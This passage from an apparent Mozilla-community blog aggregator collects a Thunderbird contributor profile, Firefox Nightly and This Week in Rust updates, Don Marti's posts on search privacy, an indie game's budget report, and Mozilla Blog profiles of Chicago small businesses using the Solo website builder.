Thunderbird offers everything you expect: handling several email accounts in one location, filtering, address books and calendar, plus many more functionalities too numerous to mention. The built-in Calendar with its Events and Tasks options is ideal for both business and personal use. In addition, you can also connect to online calendars. I find the pop-up reminders so helpful, whether it’s notifying you of an appointment, a birthday or that a TV program starts in 15 minutes! Personally, I’m particularly impressed that Thunderbird offers the ability to modify the view and appearance to suit my needs and preferences.

I use a Windows OS, but Thunderbird offers release versions for Windows, Mac and Linux, so there is a download to suit everyone. In addition, I run a beta version so I can get more recent updates, meaning I can contribute by helping to test for bugs and report issues before they reach a release version.

How They Contribute

The Thunderbird Support forum would be my choice as the first place to get help on any topic or query, and there is a direct link to it via the ‘Help’ > ‘Get Help’ menu option in Thunderbird. As I have many years of experience using Thunderbird, I volunteer my free time to assist others in the Thunderbird Support Forum, which I find a very rewarding experience. I have also helped out writing some Support Forum Help Articles. In more recent years I’ve assisted on Bugzilla, helping to triage and report potential bugs. So, people can get involved with Thunderbird in various ways.

Share Your Contributor Highlight (or Get Involved!)

Thanks to Toad Hall and all our contributors who have kept us alive and are helping us thrive!

If you’re a contributor who would like to share your story, get in touch with us at community@thunderbird.net. If you want to get involved with Thunderbird, read our guide to learn about all the ways to contribute.

The post Contributor Highlight: Toad Hall appeared first on The Thunderbird Blog.

Don Martidrinking games with the Devil

Should I get into a drinking game with the Devil? No, for three important reasons unrelated to your skill at the game.

  1. The Devil can out-drink you.

  2. The Devil can drink substances that are toxic to you even in small quantities.

  3. The Devil can cheat in ways that you will not be able to detect, and take advantage of rules loopholes that you might not understand.

What if I am really good at the skills required for the game? Still no. Even if you have an accurate idea of your own skill level, it is hard to estimate the Devil’s skill level. And even if you have roughly equally matched skills, the Devil still has the three advantages above.

What if I’m already in a drinking game with the Devil? I can’t offer a lot of help here, but I have read a fair number of comic books. As far as I can tell, your best hope is to delay playing and to delay taking a drink when required to. It is possible that some more powerful entity could distract the Devil in a way that results in the end of the game.

Bonus links

IAB, Others Urge Court To Reconsider Ruling That Curbed Section 230 (this is why the legit Internet is going to win. The lawyers needed to defend the blackout challenge are expensive, and a lot of state legislators will serve for gas money. As legislators learn to introduce more, and more diverse, laws on Big Tech, the cost imbalance will become clearer.)

In the Trenches with State Policymakers Working to Pass Data Privacy Laws Former state representative from Oklahoma, Collin Walke, said that one tech company with an office in his state hired about 30 more lobbyists just to lobby on the privacy bill he was trying to pass.

Risks vs. Harms: Youth & Social Media Of course, there are harms that I do think are product liability issues vis-a-vis social media. For example, I think that many privacy harms can be mitigated with a design approach that is privacy-by-default. I also think that regulations that mandate universal privacy protections would go a long way in helping people out. But the funny thing is that I don’t think that these harms are unique to children. These are harms that are experienced broadly. And I would argue that older folks tend to experience harms associated with privacy much more acutely.

Google Search user interface: A/B testing shows security concerns remain For the past few days, Google has been A/B testing some subtle visual changes to its user interface for the search results page….Despite a more simplified look and feel, threat actors are still able to use the official logo and website of the brand they are abusing. From a user’s point of view, such ads continue to be as misleading.

Ukraine’s new F-16 simulator spotlights a ‘paradigm shift’ led from Europe (Europe isn’t against technology or innovation, they’re mainly just better at focusing on real problems.)

Firefox NightlySearch Improvements Are On Their Way – These Weeks in Firefox: Issue 169

Highlights

  • The search team is planning on enabling a series of improvements to the search experience this week in Nightly! This project is called “Scotch Bonnet”.
    • We would love to hear your feedback via bug reports! We will also create a Connect page shortly.
    • The pref is browser.urlbar.scotchBonnet.enableOverride for anyone who wants a sneak preview (also shown in the user.js sketch after this list).
  • The New Tab team has added a new experimental widget which shows a vertical list of interesting stories across multiple cells of the story grid:

      We’re testing out a vertical list of stories in regions where stories are enabled.

    • You can test this out in Nightly by setting browser.newtabpage.activity-stream.discoverystream.contextualContent.enabled to true in about:config (also covered in the user.js sketch after this list)
    • We will be running a small experiment with this new widget, slated for Firefox 132, for regions where stories are enabled.
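
For anyone who would rather flip these prefs from a user.js file in a Nightly profile than through about:config, here is a minimal sketch covering both experiments mentioned above. These are unsupported testing toggles, and the pref names may change as the features evolve.

```
// user.js sketch for a Nightly profile: enable the two experiments mentioned above.
user_pref("browser.urlbar.scotchBonnet.enableOverride", true); // Scotch Bonnet search UI preview
user_pref("browser.newtabpage.activity-stream.discoverystream.contextualContent.enabled", true); // tall stories widget on New Tab
```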

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Henry Wilkes (they/them) [:henry-x]
  • Meera Murthy

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Fixed mild performance regression in load times when the user browses websites that are registered as default/built-in search engines (fixed in Nightly 132, and uplifted to Beta 131) – Bug 1916240
  • Fixed startup error hit by static themes using MV3 manifest.json files – Bug 1917613
  • The WebExtensions popup notification shown when an extension is hiding Firefox tabs (using the tabs.hide method) is now anchored to the extensions button – Bug 1920706
  • Fixed a browser.search.get regression (initially introduced in ESR 128 through the migration to search-config-v2) that caused faviconUrl to be set to blob URLs, which are not accessible to other extensions. The fix landed in Nightly 132 and was uplifted to Firefox 131 and ESR 128
    • Thanks to Standard8 for fixing the regression!
WebExtension APIs
  • The storage.session API now logs a warning message to raise extension developer awareness that the storage.session quota is being exceeded on channels where it is not enforced yet (currently only enforced on nightly >= 131) – Bug 1916276
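
To make the API in question concrete, here is a rough TypeScript sketch of an extension background script using storage.session; the declare block stands in for real WebExtension typings (for example webextension-polyfill), and the quota behavior described in the comments follows the item above.

```typescript
// Sketch of a WebExtension background script using browser.storage.session.
// Requires the "storage" permission; the declare block stands in for real typings.
declare const browser: {
  storage: {
    session: {
      set(items: Record<string, unknown>): Promise<void>;
      get(keys?: string | string[]): Promise<Record<string, unknown>>;
    };
  };
};

// storage.session is cleared when the browser session ends, so it suits short-lived
// state (for example a cached token) that should not be persisted to disk.
async function cacheToken(token: string): Promise<void> {
  try {
    await browser.storage.session.set({ cachedToken: token });
  } catch (err) {
    // Where the session quota is enforced (currently only Nightly >= 131), an
    // oversized write rejects; elsewhere you only get the console warning for now.
    console.warn("storage.session write failed, possibly over quota", err);
  }
}

async function readToken(): Promise<string | undefined> {
  const { cachedToken } = await browser.storage.session.get("cachedToken");
  return cachedToken as string | undefined;
}
```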

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam DeBeasi renamed the isRoot argument of getBrowsingContextInfo() to includeParentId to make the code easier to understand (bug).
  • Updates:
    • Thanks to jmaher for splitting the marionette job in several chunks (bug).
    • Julian fixed the timings for network events to be in milliseconds instead of microseconds (bug)
    • Henrik and Julian improved the framework used by WebDriver BiDi to avoid failing commands when browsing contexts are loading (bug, bug, bug)
    • Sasha updated the WebDriver BiDi implementation for cookies to use the network.cookie.CHIPS.enabled preference. The related workarounds will be removed in the near future. (bug)

Lint, Docs and Workflow

Migration Improvements

New Tab Page

  • We’re going to be doing a slow, controlled rollout to change the endpoints with which we fetch sponsored top sites and stories. This is part of a larger architectural change to unify the mechanism with which we fetch this sponsored content.

Search and Navigation

  • Scotch Bonnet (search UI update) Related Changes
    • General
      • Daisuke connected Scotch Bonnet to Nimbus 1919813
    • Intuitive Search Keywords
      • Mandy added telemetry for search restrict keywords 1917992
    • Unified Search Button
      • Dale improved the UI of the Unified Search Button by aligning it closer to the design 1908922
      • Daisuke made the Unified Search Button more consistent depending on whether it was in an open/closed state 1913234
    • Persisted Search
      • James changed Persisted Search to use a cleaner design in preparation for its use with the Unified Search Button. It now has a button on the right side to revert the address bar and show the URL. And the Persist feature now works with non-default, app-provided engines 1919193, 1915273, 1913312
    • HTTPS Trimming
      • Marco changed it so keyboard focus immediately untrims an https address 1898155

This Week In RustThis Week in Rust 568

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is float8, an 8-bit float implementation.

llogiq is still pleased with his choice, but increasingly unhappy about the lack of suggestions.

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

437 pull requests were merged in the last week

Rust Compiler Performance Triage

One regression dominated this week (dealing with a correctness fix around type system caching that was deemed necessary), but it luckily did not produce large regressions in any benchmarks. Overall, performance still ended up roughly in the same place as at the beginning of the week.

Triage done by @rylev. Revision range: c87004a1..e6c46db4

Summary:

(instructions:u)            mean    range            count
Regressions ❌ (primary)     0.3%   [0.1%, 1.0%]     63
Regressions ❌ (secondary)   1.1%   [0.1%, 3.4%]     81
Improvements ✅ (primary)   -0.5%   [-3.0%, -0.1%]   19
Improvements ✅ (secondary) -0.5%   [-1.5%, -0.1%]   46
All ❌✅ (primary)           0.1%   [-3.0%, 1.0%]    82

2 Regressions, 3 Improvements, 7 Mixed; 3 of them in rollups. 57 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust
Cargo
Language Team
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-09 - 2024-11-06 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I'm the wrong side of 45. I have zero interest in wasting any time that I might have left writing C from scratch. Writing Rust is pure joy. I can go from an idea to a working, tested, robust, published and packaged implementation in the time it would take me to even begin the first few lines of a C version. The tooling is beautiful, makes programming fun, and the end result usually outperforms the equivalent C. Once it builds I know it will run perfectly on all of the platforms I care about, and I don't have to go around manually testing on them to find all of the various platform and compiler quirks that will break it.

Jonathan Perkins on the NetBSD mailing list

Thanks to blonk for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don Martifix Google Search

I can’t quite get Google Search back to pre-enshittification, but this is pretty close.

Remove AI crap

This will probably make the biggest change in the layout. Makes the AI material and various other growth hacking stuff disappear from the top of search results pages so it’s easier to get to the normal links.

Start a blocklist

Some sites are better at SEO than at content and keep showing up in search results. This step doesn’t help the first time that a crap site comes up, but future searches on related topics tend to get better results as I block the over-SEOed sites to let the legit sites rise to the top.

  • Firefox: Personal Blocklist

  • Google Chrome: (There is supposed to be an extension like this for Google Chrome too, but I don’t have the link.)

This one gets better as my blocklist grows. If you try this one, be patient.

Turn off ad tracking

If you use Google Search with a Google Account, go to https://myadcenter.google.com/home and set Personalized Ads to Off. This probably won’t reduce the raw number of ads, but will make it harder for Google to match you with a deceptive ad targeted at you. (The scam ads are even impersonating Google now.)

Fix click tracking

Use ClearURLs to remove tracking redirects. (Original Google results were links to sites; now they’re links back to Google, which redirects to the sites, collecting extra data from you and slowing down browsing by one step. ClearURLs restores the original behavior. To me it feels faster, but I haven’t done a benchmark.)
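
To make the mechanism concrete, here is a small TypeScript sketch of the kind of rewrite ClearURLs automates. The /url?q= shape is just an illustrative example of a search-engine redirect link; the real hostnames and parameters vary and change over time, which is why an actively maintained extension is the practical option.

```typescript
// Sketch only: unwrap a search-result link that points at the search engine's
// redirect endpoint instead of the destination site. Parameter names are examples.
function unwrapRedirect(href: string): string {
  const url = new URL(href);
  if (url.hostname.endsWith("google.com") && url.pathname === "/url") {
    // The real destination rides along as a query parameter on the redirect URL.
    return url.searchParams.get("q") ?? href; // fall back to the original link
  }
  return href;
}

console.log(unwrapRedirect("https://www.google.com/url?q=https://example.com/&sa=U"));
// logs: https://example.com/
```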

Block search ads

This is the next step to try if scam-looking search ads are still getting through.

The FBI recommends “Use an ad blocking extension when performing internet searches.” (Internet Crime Complaint Center (IC3) | Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users)

Right now the extension that is best at blocking search ads is uBlock Origin, but it takes some work to set it up so that it blocks search ads while leaving ads on legit sites alone. I’ll post instructions when I get that working.

Turn off browser advertising features

These are not used much today, but turning them off will probably help you get cleaner (less personalized) search results in the future, so you might as well check them.

Bonus links

Hey Google, What’s The Chrome User Choice Mechanism Going To Look Like? (whatever the defaults are, I’ll figure out the right options and post here)

Smart TVs are like “a digital Trojan Horse” in people’s homes (Browsers are a relief after other devices)

Meta smart glasses can be used to dox anyone in seconds, study finds

Project Analyzing Human Language Usage Shuts Down Because ‘Generative AI Has Polluted the Data’

Adrian GaudebertHow much did Dawnmaker really cost?

About a year ago, I wrote a piece explaining how much we estimated making Dawnmaker would cost. Well, Dawnmaker is finished, so as promised, I'm going to revisit that and show you how much it actually cost to produce our game! Yay, more money talk!

In June 2023, I made a budget for Dawnmaker that projected the game would cost a total of 520k€ to make. A year later, I can announce that the total budget is around 320k€. Why such a big difference? Because we never managed to secure funding, and thus had to cut a lot of what we wanted to do. We did not hire a team for the production of the game, did not even do the production of the game, did not pay ourselves, and reduced our spending to the minimum.

I'm writing that the budget is 320k€, but that does not mean we actually spent that much money. The amount of money that actually passed through our bank account and was disbursed is about 95k€. The remaining 225k€ is my estimate of how much Arpentor Studio would have spent if Alexis and I had paid ourselves decent salaries for the whole duration of the project. So in a sense you could say that Dawnmaker only cost 95k€, and there's some truth to that, but it's also a lie. Our work has value and needs to be accounted for in budgeting. Because in the end, this is money that we lost by not doing something else that would have paid us.

Where did the money go?

So we spent 95k€ over the course of 2.5 years. Here are the main expense categories we had:

Dawnmaker budget breakdown

Even though we barely paid ourselves — we did for 4 months at a time when we thought we were getting a bunch of money, but ultimately did not — salaries are still the biggest category. If you include contracting, which is also paying people to work on our game, that makes up 60% of the game's budget. The rest is split between company spending (lawyers, accounting, etc.), events and travel (like going to the Game Camp every year), regular fees for online services (hosting, email, documentation) and a touch of hardware. Plus all the remaining small things that don't fit the other categories, like an ad campaign.

The financial outcome of Dawnmaker

320k€ is an incredibly big sum for such a small company, especially if you compare that to how much the game made. At the time of writing, about 6k€ made it into our bank account. Our players seem to really enjoy Dawnmaker, according to our 94% positive reviews on Steam, so I guess we can call it a critical success. But financially it's far from one: we need another 314k€ to break even!

One metric that I'm thinking about these days, as I prepare the next project, is revenue per working day. On Dawnmaker, as of writing, Alexis and I made about 6€ per working day. That's less than one tenth of the minimum wage in France, and that's without counting the money that came out of our pockets — otherwise our revenue per day would be negative.

If you're reading this and you're thinking of starting a game studio, here's the biggest advice I can give you: start by making small games. Reduce the risk — the financial cost — by making games that are small, but take them to the finish line. You'll gain experience, you'll build yourself a portfolio that will be helpful for raising funding later, and you will have a much better chance of earning a decent revenue per working day. But I'll discuss this in more detail in a future post.

Dawnmaker Characters update is available

Dawnmaker is 20% off!

Yesterday we released a major, free update for Dawnmaker, our solo turn-based strategy game. We've added 3 characters, each with their own deck and roster of buildings, as well as a ton of new content. To celebrate, we're discounting the game, 20% off for the next two weeks. If you want to experience our city building meets deckbuilding game, now is your time to get it!

Buy Dawnmaker on Steam Buy Dawnmaker on itch.io


This piece was initially sent out to the readers of our newsletter. Wanna join in on the fun? Head out to Dawnmaker's presentation page and fill the form. You'll receive regular stories about how we're making this game and the latest news of its development!

Join our community!

The Mozilla BlogSemicolon Books: A haven of independence and empowerment in Chicago

Danielle Moore is the founder of Semicolon Books in Chicago. Credit: Jesus J. Montero

Jesus J. Montero is an award-winning journalist and passionate storyteller. He’s known for his investigative work covering social justice, music and culture. Jesus J. is also a producer, curating dynamic experiences that highlight culture through storytelling and dialogue. You can follow him on Instagram at @JesusJMontero. Photo: Olivia Gatti

Danielle Moore is a woman on a mission. It shows in the carefully curated, outward-facing books that line the shelves of Semicolon Books in Chicago’s River West neighborhood.

As a lesbian Black woman in a world that often overlooks her, Danielle wanted to build a space where diverse voices are celebrated and independence thrives. “If I want to create it, I will,” she said. For her, that is the definition of independence.

To step into Danielle’s world is to experience solace and peace intended for people seeking a place to simply be. Since it opened in 2019, Semicolon has been a staple in Chicago’s literary community, offering a selection of books that celebrate stories and voices from Black history. This is also reflected in the art and cultural pieces that cover the bookstore’s walls. 

“Independence is what creates my safety,” she explained, pointing to the word “independence” tattooed on her left forearm. 

With her work, Danielle strives to foster independence in others. One of her goals is to improve youth literacy in Chicago. She frequently donates much of her inventory to book drives for children, as well as for incarcerated individuals across Illinois.

Danielle encourages finding empowerment by building one’s own safe haven, just as she did.  “If you’re someone who constantly feels othered, create something,” Danielle advised. “It’s the only way to build a safe mental, emotional and physical space for yourself.”

A display of books at Semicolon Books, highlighting titles that celebrate Black voices and experiences. Credit: Jesus J. Montero

The experiences that inspired Danielle to open Semicolon began in her childhood. “Books saved my life,” she reflected, remembering a time when the world offered her no other escape. Growing up, Danielle moved between homeless shelters, where books became her refuge. They opened her eyes to endless possibilities and offered life lessons that carried her into adulthood.

Her love for books continues to shape her today. “I’m always reading ‘All About Love’ by bell hooks,” Danielle said. “It’s about love in its truest form — community love — and how you can’t love anybody else if you don’t love yourself. But more than that, it teaches that you can’t claim to love something if you aren’t giving back to the community, ensuring that people feel that love in real, tangible ways.”

Empowering others

Danielle Moore greets a visitor outside Semicolon Books in Chicago. Credit: Jesus J. Montero

Despite facing challenges — whether it’s critics questioning her outward-facing book displays, which isn’t the industry standard, or landlords threatening to raise rent — Danielle remains focused. “I remember sitting in the space, meditating and being reminded that this space isn’t for them,” she said. “This space is for me.” 

Building a business, cultivating a community and creating art are all acts of love for Danielle. “Part of that is making sure others feel free to do the same, to carve out their own spaces of joy and expression,” she said. 

Expanding her world 

Now, as Danielle embarks on new ventures beyond Semicolon’s River West location, she reflects on the journey that brought her here. “Everything always works out,” she said, a personal mantra of sorts. 

Semicolon recently opened a new location on the ground floor of the historic Wrigley Building on the Mag Mile. Danielle also plans to launch an outpost in the East Garfield Park neighborhood.

Visitors enjoy the relaxed atmosphere at Semicolon Books in Chicago, whether browsing the shelves or working on laptops. Credit: Jesus J. Montero

Her ambition extends beyond Chicago. In addition to a store in Chicago O’Hare International Airport, Danielle has London and Tokyo locations in her sights.

And as the world expands for Semicolon, so too does its reach online. “The dope part about the internet is that it makes the world small, really fast,” Danielle said. “I can see something incredible, track down the person behind it, and fangirl over them. I love that.” For Danielle, the internet is more than just a tool — it’s a bridge, connecting her with people and communities she might otherwise never encounter.

Owning a bookstore was never part of her original plan, but Danielle now envisions Semicolon becoming the world’s largest independent, nonprofit Black-owned bookseller.

“If I’m not even supposed to be here, I’m gonna do what I want,” she said, determined to spread her message of freedom for all seeking a place to just be.

An aerial view of Semicolon Books in Chicago. Credit: Jesus J. Montero

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out Danielle Moore’s Solo website here.


Ready to start creating?

Launch your website

The post Semicolon Books: A haven of independence and empowerment in Chicago appeared first on The Mozilla Blog.

The Mozilla BlogThe Pop-Up: A homegrown space for Chicago’s creatives

Kevin and Molly Woods run The Pop-Up, a resale boutique and creative outlet for local artists, nestled in Chicago’s Wicker Park neighborhood. Credit: Jesus J. Montero


Freedom and legacy go hand in hand. For entrepreneurs, it means building something that reflects not only their vision but also the stories they want to share with the world.

Husband-and-wife Kevin and Molly Woods embody that philosophy. Their partnership began with a LinkedIn message — one that didn’t lead to a job, but to something much bigger. “She was a recruiter,” Kevin recalled. “You know those messages you always think are a scam? Well, that’s how we met. She sent me one of those 15 years ago, and we’ve been together ever since.”

A new era of creators

The Pop-Up blends style with community-focused retail in Chicago’s Wicker Park. Credit: Jesus J. Montero

Fast forward to today, Kevin and Molly now run The Pop-Up, a resale boutique and creative outlet for local artists, nestled in Chicago’s Wicker Park neighborhood. The store’s mission is rooted in the spirit of collaboration and community. But that path hasn’t been without challenges.

“This space is more than just a store. It’s our home,” Molly shared after their shop was broken into — twice. Yet, through it all, they stayed resilient. The space, once home to the iconic RSVP Gallery where creatives like Don C and the late Virgil Abloh once shaped Chicago’s cultural scene, is now a hub for a new generation of artists and collaborators.

“This isn’t just about selling clothes,” Kevin emphasized. “It’s about creating a space where ideas take flight, where people can come together to celebrate the boundless creativity in this city.”

A vintage yellow Sade t-shirt hangs in The Pop-Up boutique. Credit: Jesus J. Montero

Both Kevin and Molly come from backgrounds in HR, and while they found success in the corporate world, it never quite felt like enough. “We were both HR professionals for years,” Kevin explained, “but we wanted to create something of our own.”

A trip to Japan in 2019 was pivotal. “That trip changed everything for me,” Kevin said. “I came back inspired to create something of my own. I secured the domain as soon as I landed, and that’s when The Pop-Up was born.”

A community-driven comeback

Their dream became a reality, but not without hurdles. After the break-ins, The Pop-Up was forced to close its doors temporarily. However, the community they had poured so much into over the years rallied around them, providing support and encouragement. “It was inspirational to see how everybody in the team rallied together, working through, being resilient, and patient. Knowing that there was light at the end of the tunnel,” Kevin shared.

“They’re not just employees,” Molly added. “They’re family. We’ve watched them grow, their talents blossoming right in front of us.”

Kevin Woods, co-owner of The Pop-Up, organizes clothing on display in their Wicker Park boutique. Credit: Jesus J. Montero

The Pop-Up now thrives as a collaborative space, hosting local designers, artists and small businesses — each contributing to Chicago’s vibrant creative scene. The internet has also played a role in cultivating this community. “It’s definitely a tool,” Kevin said. “It helps us connect. … But at the end of the day, I still believe in that personal interaction to really connect and validate those relationships.”

Now reopened with a fresh design and layout, The Pop-Up continues its mission of supporting local talent and fostering community. Kevin and Molly’s journey is one of resilience and creativity, and their store stands as a testament to the power of collaboration.

“Working with local people to do great things — that’s how we started, and that’s how all of this came to life,” Kevin said, looking ahead to what’s next for The Pop-Up.

With its doors open once again, The Pop-Up is ready to continue adding to Chicago’s rich history and culture in fashion and beyond — one collaboration at a time.

An aerial view of Chicago’s Wicker Park neighborhood, home to The Pop-Up boutique, with the downtown skyline in the distance. Credit: Jesus J. Montero

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out The Pop-Up founders Kevin and Molly Woods’ Solo website here.


Ready to start creating?

Launch your website

The post The Pop-Up: A homegrown space for Chicago’s creatives appeared first on The Mozilla Blog.

The Mozilla BlogDishRoulette Kitchen: Empowering Chicago’s entrepreneurs for generational change

The DishRoulette Kitchen team gathers by a communal table originally from the first restaurant they worked with. Crafted now into a conference table, it remains a symbol of DRK. Credit: Jesus J. Montero


Community is power. That’s the driving force behind DishRoulette Kitchen, a support hub for local food entrepreneurs in Chicago’s Pilsen neighborhood.

DRK was born in 2020, at the height of the COVID-19 pandemic. It started with an observation from Brian Soto, an accountant who saw firsthand how many of his small business clients were ineligible for government relief programs because they lacked the necessary paperwork or tax documentation. “So many of these businesses were shut out of crucial government funding,” explained Chris Cole, DRK’s director of partnerships and communications. “Brian realized that this wasn’t just an issue for his clients, but for small businesses across Chicago.”

Brian partnered with Jackson Flores, and together they founded DRK to address these challenges. The goal was simple: to provide grants, coaching and the financial and operational expertise small businesses needed to survive — and thrive. From helping businesses manage their taxes to offering guidance on rent and payroll, DRK has since become a lifeline for many local entrepreneurs.

“We’re scrappy,” admitted Jackson, DRK’s executive director. “We bootstrapped this entire thing, and we’re going to keep making it happen, no matter what, because the people we serve deserve the chance to thrive, to create the life they’ve always dreamed of.”

Support for real-time challenges

“When an entrepreneur comes in with a problem, we create a roadmap to turn that into a success,” explained Brian Soto, director of finance at DishRoulette Kitchen. Credit: Jesus J. Montero

Each member of the DRK team brings a wealth of experience, including from the corporate, finance, tech and hospitality industries. Now, they’re applying those principles back into the community, giving entrepreneurs the tools they need to succeed. Since its inception, DRK has created a space where self-made entrepreneurs can tap into that corporate expertise and gain the resources they need. The team offers tailored workshops, consultations and one-on-one coaching.

“It’s not just about the business. It’s about the whole person, the family, the community,” said Hector Pardo, DRK’s director of strategy and operations. “When we see one of our entrepreneurs thrive, it’s like popping a bottle of champagne. We’re in this together, and their wins are our wins.”

For many on the team, this work is personal. DRK Program Analyst Melissa Villalba grew up watching her parents’ small business struggle. She knows firsthand how a resource like DRK could have transformed their experience. “Our parents came here with nothing, but they made it work,” Melissa said. “That’s what inspires us — to see what’s possible when you have the right tools and support.”

DRK tailors its guidance to meet the real-time challenges its entrepreneurs face. “When an entrepreneur comes in with a problem, we create a roadmap to turn that into a success,” Brian explained. The team adjusts their lessons as needed, evolving alongside the businesses they support.

Going digital and beyond

Each member of the DRK team brings a wealth of experience, including from the corporate, finance, tech and hospitality industries. Credit: Jesus J. Montero

A key part of that evolution is helping entrepreneurs build and maintain a digital presence, which is crucial in today’s marketplace. “A digital presence is everything for small businesses now,” Chris noted. “We help them not just set up websites, but actually understand how to track their traffic, engage with customers online, and manage sales. We walk them through it one-on-one because too many small business owners don’t get formal training in these areas, and they need someone to show them the ropes.”

DRK’s impact goes beyond just small businesses in Chicago. They’ve worked on national partnerships with major organizations like the James Beard Foundation, and even collaborated on a project with Bad Bunny. But their heart remains rooted in supporting local entrepreneurs.

“We’ve done so many iterations of what we’re doing now, and it’s finally starting to get the attention and support we need,” Jackson added. The team’s diverse leadership is building not only businesses but also a legacy of freedom and opportunity for a new generation of entrepreneurs.

DRK is proof that when local businesses thrive, entire communities benefit. What started as an urgent response to a pandemic-induced crisis has transformed into a vital entrepreneurial hub, one that will continue to create ripple effects throughout Chicago’s neighborhoods for years to come.

A vibrant mural celebrating the rich cultural heritage of Chicago’s Pilsen neighborhood against the backdrop of the city’s skyline. Credit: Jesus J. Montero

Chicago’s small business owners are shaping their communities with purpose. In this series, we highlight the entrepreneurs behind local gems – each of them building something bigger than just a business. Through Solo, Mozilla’s free AI-powered website creator, they’re exploring new corners of their community online. Check out DishRoulette Kitchen‘s Solo website here.


Ready to start creating?

Launch your website

The post DishRoulette Kitchen: Empowering Chicago’s entrepreneurs for generational change appeared first on The Mozilla Blog.

The Mozilla BlogLocal roots, digital connections: How Chicago’s small businesses are building with Solo

Kevin Woods, co-owner of The Pop-Up, organizes clothing on display in their Wicker Park boutique. Credit: Jesus J. Montero

As a community builder at Mozilla, I’m all about staying connected — whether that’s producing community events to invite more people into our brand, or working directly with people to make sure our products are actually helping those who need them most. Recently, I had the chance to sit down with three amazing small business owners in Chicago to explore how Solo, Mozilla’s AI-powered website builder, could help them expand their online presence. Solo is built to make creating websites easy, but these sessions were about more than that — they were about building new websites for these small business owners to share their stories and build stronger connections with their communities.

Each of these entrepreneurs had a unique vision for how they wanted to grow their business online. Here’s how we worked together to bring their ideas to life.

Building a digital hub for a community of first-gen entrepreneurs

Soloist.ai/dishroulette showcases the many restaurants that DishRoulette Kitchen is supporting.

Jackson Flores runs DishRoulette Kitchen, an organization that supports first-generation business owners in Chicago’s food scene. DRK already had a website, but they wanted to take things further. Instead of just focusing on DRK, we decided to create a digital hub that showcases the many restaurants they’re helping — many of which didn’t have their own websites.

We built a directory that brings these restaurants together in one space, making it easy for locals to discover new food spots and connect with the people behind the businesses. Working with Jackson was inspiring — her passion for uplifting first-gen entrepreneurs really shone through. The site we built reflects the amazing work DRK is doing in the community, giving more visibility to the businesses they support. You can check out DRK’s Solo website here

Creating a digital space for a multifaceted career

DanniMoore.com showcases Danielle Moore’s multifaceted career, highlighting her work with Semicolon Books, Single Story Whiskey and her experience in museum and event curation.

Danielle Moore is the owner of Semicolon Books, an independent bookstore in Chicago with a strong community following. Danielle’s work goes far beyond books — she’s also spent 15 years as a museum curator and has recently launched her own whiskey brand. With all these ventures, Danielle needed a website that could tie everything together and present her full story in one cohesive place.

During our session, we built a personal website that allows her to showcase all sides of her career — from books to art to whiskey. Now, her community can see the full scope of her talent, with a site that reflects the many passions that drive her. For Danielle, it was about creating a digital home where her entire journey could come together, offering a complete picture of who she is and what she’s building. You can check out Danielle’s Solo website here

Turning a long-delayed project into reality

Digital Produce is The Pop-Up founder Kevin Woods’ own streetwear brand.

